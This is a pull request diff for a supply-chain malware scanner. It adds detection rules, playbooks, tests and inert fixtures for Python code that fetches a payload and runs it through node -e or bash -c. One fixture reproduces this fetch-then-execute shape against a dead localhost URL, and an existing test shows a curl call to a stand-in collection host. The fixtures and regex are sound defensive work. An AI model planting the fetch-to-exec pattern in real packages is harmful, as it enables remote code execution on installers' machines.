### PR TITLE
v2.11.46 - feat: PYSRC-009/010 fork-exec inline interpreter

### DIFF
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -105,13 +105,13 @@ Never skip documentation updates when publishing a new version.
 - Never commit directly to master
 - Do not create commits automatically — the user handles commits manually
 
-## Current Metrics (v2.11.45)
+## Current Metrics (v2.11.46)
 
 | Metric | Value |
 |--------|-------|
-| Version | **2.11.45** |
-| Tests | **3870** passed, 0 failed, across 105 files (14511 skipped when Docker absent) |
-| Rules | **256** (251 RULES + 5 PARANOID) |
+| Version | **2.11.46** |
+| Tests | **3877** passed, 0 failed, across 105 files (14511 skipped when Docker absent) |
+| Rules | **258** (253 RULES + 5 PARANOID) |
 | Scanners | **20 parallel** (Promise.allSettled) + **2 pre-analysis** (module-graph/, deobfuscate) + **1 async parser bootstrap** (python-ast WASM init, no analysis emitted) + **5 conditional/post-processing** (paranoid, 3× temporal-*, reachability) + **1 metadata** (npm-registry). 25 fichiers `src/scanner/*.js` + 1 dir `module-graph/` (9 fichiers) + 1 dir `python-ast-detectors/` (6 fichiers, +taint-tracker + handle-assignment depuis Phase 1b). Détails : ARCHITECTURE.md. |
 | TPR@3 (detection rate) | **93.85%** (61/65 ground truth, v2.10.95 metrics — re-measure pending P0-04 audit) |
 | TPR@20 (alert rate) | **86.2%** (56/65 ground truth, v2.10.95 metrics) |

--- a/package-lock.json
+++ b/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.45",
+  "version": "2.11.46",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "muaddib-scanner",
-      "version": "2.11.45",
+      "version": "2.11.46",
       "license": "MIT",
       "dependencies": {
         "@inquirer/prompts": "8.4.3",

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.45",
+  "version": "2.11.46",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

--- a/src/response/playbooks.js
+++ b/src/response/playbooks.js
@@ -498,6 +498,21 @@ const PLAYBOOKS = {
     'qui ne tracent que les "import X" statiques. Inspecter les appels suivants au module dynamiquement ' +
     'importe — combine a exec/subprocess/fetch indique malveillance avec haute confiance.',
 
+  fork_exec_inline_interpreter:
+    'HIGH: subprocess.X([<interpreter>, -e|-c, ...]) — fork-exec d\'un interpreteur inline ' +
+    '(node -e, python -c, bash -c, ruby -e, perl -e, php -r, ...). Pattern transversal: Python ouvre ' +
+    'un interpreteur d\'un autre langage et lui passe du code dans argv. Signe canonique d\'un staging ' +
+    'multi-langage (TrapDoor mai 2026). NE PAS installer. Inspecter le code passe en argv pour identifier ' +
+    'le payload reel. Si le 3eme element de la liste est une variable, suivre l\'assignment en amont.',
+
+  fetch_to_fork_exec_inline:
+    'CRITIQUE: Pattern TrapDoor exact. Le meme fichier Python fetch un payload reseau ' +
+    '(urllib/requests/httpx/aiohttp) ET le passe a subprocess.X([<interpreter>, -e, ...]) dans le meme ' +
+    'fichier. Le payload distant est execute cote interpreter forked (Node/Bash/Ruby/...) — echappe a ' +
+    'PYAST-005 parce qu\'il n\'y a pas d\'exec/eval Python. NE PAS installer. Bloquer le domaine du fetch ' +
+    'au firewall. Si execute: incident response complet, regenerer tous les secrets — le payload distant ' +
+    'a pu exfiltrer SSH, AWS, GitHub, npm tokens.',
+
   ai_agent_abuse:
     'CRITIQUE: Un agent IA (Claude, Gemini, Q) est invoque avec des flags de bypass de securite ' +
     '(--dangerously-skip-permissions, --yolo, --trust-all-tools). Technique s1ngularity/Nx. ' +

--- a/src/rules/index.js
+++ b/src/rules/index.js
@@ -338,6 +338,37 @@ const RULES = {
     ],
     mitre: 'T1027.013'
   },
+  // PYSRC-009 / 010 — fork-exec inline interpreter (v2.11.46). Comble le gap
+  // TrapDoor exact : subprocess.run(["node"|"bash"|..., "-e"|"-c", payload]).
+  // Pattern transversal multi-langage qui echappe a PYAST-005 parce qu'il n'y
+  // a pas d'exec()/eval() Python — l'execution est cote interpreter forked.
+  fork_exec_inline_interpreter: {
+    id: 'MUADDIB-PYSRC-009',
+    name: 'Python Fork-Exec Inline Interpreter',
+    severity: 'HIGH',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'subprocess.{Popen,run,call,check_output,check_call,getoutput}([<interpreter>, <inline-flag>, ...]) — fork-exec d\'un interpreteur inline (node -e, python -c, bash -c, ruby -e, perl -e, php -r, ...). Signe canonique d\'un staging multi-langage : Python ouvre un autre interpreteur et lui passe du code dans argv. Pattern central de TrapDoor (mai 2026).',
+    references: [
+      'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
+      'https://attack.mitre.org/techniques/T1059/'
+    ],
+    mitre: 'T1059'
+  },
+  fetch_to_fork_exec_inline: {
+    id: 'MUADDIB-PYSRC-010',
+    name: 'Python Fetch + Fork-Exec Inline Interpreter (TrapDoor signature)',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'Compound : le meme fichier Python contient un fetch reseau (urllib/requests/httpx/aiohttp/http.client) ET un subprocess.X([<interpreter>, -e|-c, ...]). Signature directe de TrapDoor : telecharge un payload depuis le C2 puis l\'execute via fork-exec d\'un interpreteur inline. Echappe a PYAST-005 (fetch+exec taint) parce que l\'execution est cote Node/Bash/Ruby/... pas cote Python.',
+    references: [
+      'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
+      'https://attack.mitre.org/techniques/T1105/',
+      'https://attack.mitre.org/techniques/T1059/'
+    ],
+    mitre: 'T1105'
+  },
 
   // PYAST-001 a 008 — Python AST scanner via tree-sitter (TrapDoor PyPI parity,
   // v2.11.42+). Mirror du `ast.js` cote npm : full CST walk avec scope tracking,

--- a/src/scanner/python-source.js
+++ b/src/scanner/python-source.js
@@ -188,6 +188,34 @@ function detectDynamicDangerousImport(content) {
   return /__import__\s*\(\s*['"](subprocess|os|requests|urllib|urllib2|socket|http|ssl|ctypes|importlib)['"]/.test(content);
 }
 
+// PYSRC-009 — fork-exec d'un interpréteur inline. Pattern :
+//   subprocess.{Popen,run,call,check_output,check_call,getoutput}(
+//       [ "<interpreter>", "<inline-flag>", <code>, ... ], ...)
+// Le premier élément de la liste est un nom d'interpréteur (literal string),
+// le deuxième est un flag d'exécution inline (-e, -c, --eval, --command, -r).
+// C'est le signe canonique d'un staging multi-langage (Python ouvre un
+// interpréteur Node/Bash/Ruby/... et lui passe du code dans argv).
+// Référence : TrapDoor (mai 2026) — `subprocess.run(["node", "-e", payload])`
+// avec payload fetched depuis le C2 — pattern qui échappe à PYAST-005 parce
+// qu'il n'y a pas d'`exec()`/`eval()` Python, l'exécution est côté interpréteur
+// forked.
+const FORK_EXEC_INLINE_INTERPRETER_RE = (() => {
+  const SUBPROC_CALLEES = 'Popen|run|call|check_output|check_call|getoutput|getstatusoutput';
+  const INTERPRETERS = 'node|nodejs|deno|bun|python|python2|python3|python3\\.\\d+|bash|sh|zsh|dash|ksh|ash|ruby|perl|php|lua|powershell|pwsh|cmd';
+  const INLINE_FLAGS = '-e|-c|--eval|--command|-r';
+  // All template inputs above are file-local constants — no user input flows
+  // here, so the security/detect-non-literal-regexp warning is a false positive.
+  // eslint-disable-next-line security/detect-non-literal-regexp
+  return new RegExp(
+    String.raw`\bsubprocess\.(?:${SUBPROC_CALLEES})\s*\(\s*\[\s*['"](?:${INTERPRETERS})['"]\s*,\s*['"](?:${INLINE_FLAGS})['"]`,
+    'i'
+  );
+})();
+
+function detectForkExecInlineInterpreter(content) {
+  return FORK_EXEC_INLINE_INTERPRETER_RE.test(content);
+}
+
 /**
  * Scan Python source files under targetPath for import-time / install-time RCE.
  *
@@ -237,6 +265,7 @@ function scanPythonSource(targetPath) {
     const hasBase64 = detectBase64Decode(cleaned);
     const hasDeser = detectDeserialization(cleaned);
     const hasDynImport = detectDynamicDangerousImport(cleaned);
+    const hasForkExecInline = detectForkExecInlineInterpreter(cleaned);
 
     if (hasExec) {
       threats.push({
@@ -296,6 +325,28 @@ function scanPythonSource(targetPath) {
         file: relPath
       });
     }
+    // PYSRC-009: fork-exec inline interpreter — pattern transversal (node -e,
+    // python -c, bash -c, ...). HIGH because it's structurally suspicious in
+    // __init__.py / setup.py but has some legit uses (build scripts).
+    if (hasForkExecInline) {
+      threats.push({
+        type: 'fork_exec_inline_interpreter',
+        severity: 'HIGH',
+        message: `${relPath}: subprocess.X(['<interpreter>', '-e|-c', ...]) — fork-exec of an inline interpreter (node/python/bash/ruby/perl/...). Canonical staging pattern for multi-language malware.`,
+        file: relPath
+      });
+    }
+    // PYSRC-010: fetch + fork-exec inline = TrapDoor signature exact. CRITICAL
+    // because the file fetches remote bytes and feeds them to a forked
+    // interpreter — RCE-equivalent without using Python's exec/eval.
+    if (hasFetch && hasForkExecInline) {
+      threats.push({
+        type: 'fetch_to_fork_exec_inline',
+        severity: 'CRITICAL',
+        message: `${relPath}: network fetch (urllib/requests/...) AND subprocess.X(['<interpreter>', '-e', ...]) in same file — TrapDoor signature: fetch remote payload then fork-exec it through an inline interpreter. Escapes PYAST-005 (which only tracks Python exec/eval) because execution is on the forked interpreter side.`,
+        file: relPath
+      });
+    }
   }
 
   return threats;
@@ -314,6 +365,7 @@ module.exports = {
     detectNetworkFetch,
     detectBase64Decode,
     detectDeserialization,
-    detectDynamicDangerousImport
+    detectDynamicDangerousImport,
+    detectForkExecInlineInterpreter
   }
 };

--- a/tests/integration/blue-team-v8b.test.js
+++ b/tests/integration/blue-team-v8b.test.js
@@ -315,11 +315,11 @@ if (isCI) { require('child_process').exec('curl http://collect.example.com/ci');
   // Rule count verification
   // =========================================================================
 
-  test('v8b: rule count is 256 (251 RULES + 5 PARANOID, PYAST-005/006/009/010 Phase 1b: +4 rules)', () => {
+  test('v8b: rule count is 258 (253 RULES + 5 PARANOID, PYSRC-009/010 fork-exec inline: +2 rules)', () => {
     const { RULES, PARANOID_RULES } = require('../../src/rules/index.js');
     const ruleCount = Object.keys(RULES).length;
     const paranoidCount = Object.keys(PARANOID_RULES).length;
-    assert(ruleCount === 251, `Expected 251 RULES, got ${ruleCount}`);
+    assert(ruleCount === 253, `Expected 253 RULES, got ${ruleCount}`);
     assert(paranoidCount === 5, `Expected 5 PARANOID, got ${paranoidCount}`);
   });
 }

--- a/tests/integration/v266-fixes.test.js
+++ b/tests/integration/v266-fixes.test.js
@@ -157,12 +157,12 @@ jobs:
     }
   });
 
-  // 3.3b Rule count check (PYAST-005/006/009/010 Phase 1b: +4 rules → 251 RULES)
-  test('P3: rule count is 256 (251 RULES + 5 PARANOID)', () => {
+  // 3.3b Rule count check (PYSRC-009/010 fork-exec inline: +2 rules → 253 RULES)
+  test('P3: rule count is 258 (253 RULES + 5 PARANOID)', () => {
     const { RULES, PARANOID_RULES } = require('../../src/rules/index.js');
     const ruleCount = Object.keys(RULES).length;
     const paranoidCount = Object.keys(PARANOID_RULES).length;
-    assert(ruleCount === 251, `Expected 251 RULES, got ${ruleCount}`);
+    assert(ruleCount === 253, `Expected 253 RULES, got ${ruleCount}`);
     assert(paranoidCount === 5, `Expected 5 PARANOID, got ${paranoidCount}`);
   });
 

--- a/tests/samples/python-source/fork-exec-bash-c/__init__.py
+++ b/tests/samples/python-source/fork-exec-bash-c/__init__.py
@@ -1,0 +1,3 @@
+# Fixture: PYSRC-009 — bash -c variant. Inert echo.
+import subprocess
+subprocess.Popen(["bash", "-c", "echo synthetic"])

--- a/tests/samples/python-source/fork-exec-bash-c/package.json
+++ b/tests/samples/python-source/fork-exec-bash-c/package.json
@@ -1,0 +1,1 @@
+{ "name": "pysrc-fork-exec-bash-c-fixture", "version": "0.0.0", "description": "PYSRC-009 (bash -c variant). NOT REAL MALWARE." }

--- a/tests/samples/python-source/fork-exec-node-e/__init__.py
+++ b/tests/samples/python-source/fork-exec-node-e/__init__.py
@@ -1,0 +1,3 @@
+# Fixture: PYSRC-009 — fork-exec node -e with inert literal payload.
+import subprocess
+subprocess.run(["node", "-e", "console.log('synthetic fixture, no side effect')"])

--- a/tests/samples/python-source/fork-exec-node-e/package.json
+++ b/tests/samples/python-source/fork-exec-node-e/package.json
@@ -1,0 +1,1 @@
+{ "name": "pysrc-fork-exec-node-e-fixture", "version": "0.0.0", "description": "PYSRC-009 positive (atomic). NOT REAL MALWARE." }

--- a/tests/samples/python-source/fork-exec-python-c/__init__.py
+++ b/tests/samples/python-source/fork-exec-python-c/__init__.py
@@ -1,0 +1,3 @@
+# Fixture: PYSRC-009 — python -c variant. Inert no-op.
+import subprocess
+subprocess.check_output(["python3", "-c", "import sys; print(sys.version_info)"])

--- a/tests/samples/python-source/fork-exec-python-c/package.json
+++ b/tests/samples/python-source/fork-exec-python-c/package.json
@@ -1,0 +1,1 @@
+{ "name": "pysrc-fork-exec-python-c-fixture", "version": "0.0.0", "description": "PYSRC-009 (python -c variant). NOT REAL MALWARE." }

--- a/tests/samples/python-source/subprocess-no-list-cmd/__init__.py
+++ b/tests/samples/python-source/subprocess-no-list-cmd/__init__.py
@@ -1,0 +1,5 @@
+# Fixture: NEG — string cmd via shell, not the list form. PYSRC-009 must NOT fire
+# (it targets the list `["node", "-e", code]` shape). PYAST-004 catches the
+# shell=True risk separately, which is the right division of labour.
+import subprocess
+subprocess.run("node -e 'console.log(1)'", shell=True)

--- a/tests/samples/python-source/subprocess-no-list-cmd/package.json
+++ b/tests/samples/python-source/subprocess-no-list-cmd/package.json
@@ -1,0 +1,1 @@
+{ "name": "pysrc-subprocess-no-list-cmd-fixture", "version": "0.0.0", "description": "Negative: subprocess('node -e ...', shell=True) — string cmd via shell, not list cmd. Should NOT fire PYSRC-009 (PYAST-004 catches it via shell=True separately)." }

--- a/tests/samples/python-source/subprocess-script-not-inline/__init__.py
+++ b/tests/samples/python-source/subprocess-script-not-inline/__init__.py
@@ -1,0 +1,5 @@
+# Fixture: NEG — runs a real script file, NOT inline code. Should not fire PYSRC-009.
+# PYSRC-002 (subprocess) still fires because subprocess.run is itself the trigger,
+# but that's a different rule with broader scope.
+import subprocess
+subprocess.run(["node", "real_script.js"])

--- a/tests/samples/python-source/subprocess-script-not-inline/package.json
+++ b/tests/samples/python-source/subprocess-script-not-inline/package.json
@@ -1,0 +1,1 @@
+{ "name": "pysrc-subprocess-script-not-inline-fixture", "version": "0.0.0", "description": "Negative: subprocess.run(['node', 'script.js']) — list-cmd but no inline flag. Should NOT fire PYSRC-009." }

--- a/tests/samples/python-source/trapdoor-fetch-fork-exec/__init__.py
+++ b/tests/samples/python-source/trapdoor-fetch-fork-exec/__init__.py
@@ -1,0 +1,7 @@
+# Fixture: PYSRC-009 + PYSRC-010 compound. Exact TrapDoor signature:
+# fetch payload + fork-exec via node -e. URL points to localhost port 0,
+# so the fixture is inert; the file shape is what we detect.
+import urllib.request
+import subprocess
+payload = urllib.request.urlopen("http://127.0.0.1:0/synthetic").read()
+subprocess.run(["node", "-e", payload])

--- a/tests/samples/python-source/trapdoor-fetch-fork-exec/package.json
+++ b/tests/samples/python-source/trapdoor-fetch-fork-exec/package.json
@@ -1,0 +1,1 @@
+{ "name": "pysrc-trapdoor-fetch-fork-exec-fixture", "version": "0.0.0", "description": "PYSRC-009 + PYSRC-010 (compound). Exact TrapDoor pattern. NOT REAL MALWARE — URL is localhost port 0." }

--- a/tests/scanner/python-source.test.js
+++ b/tests/scanner/python-source.test.js
@@ -219,6 +219,71 @@ async function runPythonSourceTests() {
       cleanup(tmp);
     }
   });
+
+  // =========================================================================
+  // PYSRC-009 / 010 — fork-exec inline interpreter (TrapDoor gap, v2.11.46)
+  // =========================================================================
+
+  await asyncTest('PYSRC-009: subprocess.run(["node", "-e", ...]) fires HIGH', async () => {
+    const result = await runScanDirect(path.join(FIXTURES, 'fork-exec-node-e'));
+    const t = result.threats.find(t => t.type === 'fork_exec_inline_interpreter');
+    assert(t, 'PYSRC-009 should fire on node -e fork-exec');
+    assert(t.severity === 'HIGH', `expected HIGH, got ${t.severity}`);
+  });
+
+  await asyncTest('PYSRC-010: fetch + fork-exec compound fires CRITICAL (TrapDoor signature)', async () => {
+    const result = await runScanDirect(path.join(FIXTURES, 'trapdoor-fetch-fork-exec'));
+    const atomic = result.threats.find(t => t.type === 'fork_exec_inline_interpreter');
+    const compound = result.threats.find(t => t.type === 'fetch_to_fork_exec_inline');
+    assert(atomic, 'PYSRC-009 should also fire (atomic + compound coexist)');
+    assert(compound, 'PYSRC-010 (fetch + fork-exec compound) should fire');
+    assert(compound.severity === 'CRITICAL', `expected CRITICAL, got ${compound.severity}`);
+  });
+
+  await asyncTest('PYSRC-009: bash -c variant fires', async () => {
+    const result = await runScanDirect(path.join(FIXTURES, 'fork-exec-bash-c'));
+    const t = result.threats.find(t => t.type === 'fork_exec_inline_interpreter');
+    assert(t, 'PYSRC-009 should fire on bash -c fork-exec');
+  });
+
+  await asyncTest('PYSRC-009: python -c variant fires', async () => {
+    const result = await runScanDirect(path.join(FIXTURES, 'fork-exec-python-c'));
+    const t = result.threats.find(t => t.type === 'fork_exec_inline_interpreter');
+    assert(t, 'PYSRC-009 should fire on python -c fork-exec');
+  });
+
+  await asyncTest('PYSRC-009: subprocess.run(["node", "script.js"]) without inline flag — no fire', async () => {
+    const result = await runScanDirect(path.join(FIXTURES, 'subprocess-script-not-inline'));
+    const t = result.threats.find(t => t.type === 'fork_exec_inline_interpreter');
+    assert(!t,
+      'PYSRC-009 should NOT fire when the list cmd has no inline flag (-e/-c); ' +
+      'running a real script file is not the targeted pattern.');
+  });
+
+  await asyncTest('PYSRC-009: subprocess shell=True with string cmd — no PYSRC-009 fire', async () => {
+    const result = await runScanDirect(path.join(FIXTURES, 'subprocess-no-list-cmd'));
+    const t = result.threats.find(t => t.type === 'fork_exec_inline_interpreter');
+    assert(!t,
+      'PYSRC-009 targets the list-form `["node", "-e", code]`. String cmd via shell=True ' +
+      'is handled by PYAST-004 separately, so PYSRC-009 must not fire here.');
+  });
+
+  await asyncTest('PYSRC-009: ruby -e and perl -e variants fire', async () => {
+    const { _internal } = require('../../src/scanner/python-source.js');
+    const { detectForkExecInlineInterpreter } = _internal;
+    assert(detectForkExecInlineInterpreter('subprocess.run(["ruby", "-e", "puts 1"])\n'),
+      'ruby -e should fire');
+    assert(detectForkExecInlineInterpreter('subprocess.run(["perl", "-e", "print 1"])\n'),
+      'perl -e should fire');
+    assert(detectForkExecInlineInterpreter('subprocess.Popen(["php", "-r", "echo 1;"])\n'),
+      'php -r should fire');
+    assert(detectForkExecInlineInterpreter('subprocess.run(["powershell", "-c", "Get-Date"])\n'),
+      'powershell -c should fire');
+    assert(!detectForkExecInlineInterpreter('subprocess.run(["node", "build.js"])\n'),
+      'node + script (no flag) should NOT fire');
+    assert(!detectForkExecInlineInterpreter('subprocess.run(["unknown_tool", "-e", "x"])\n'),
+      'unknown interpreter should NOT fire');
+  });
 }
 
 module.exports = { runPythonSourceTests };


### PR DESCRIPTION
Closes TrapDoor gap: subprocess.run(['node'|'bash'|..., '-e'|'-c', payload]). PYSRC-009 HIGH atomic + PYSRC-010 CRITICAL compound (fetch+fork-exec).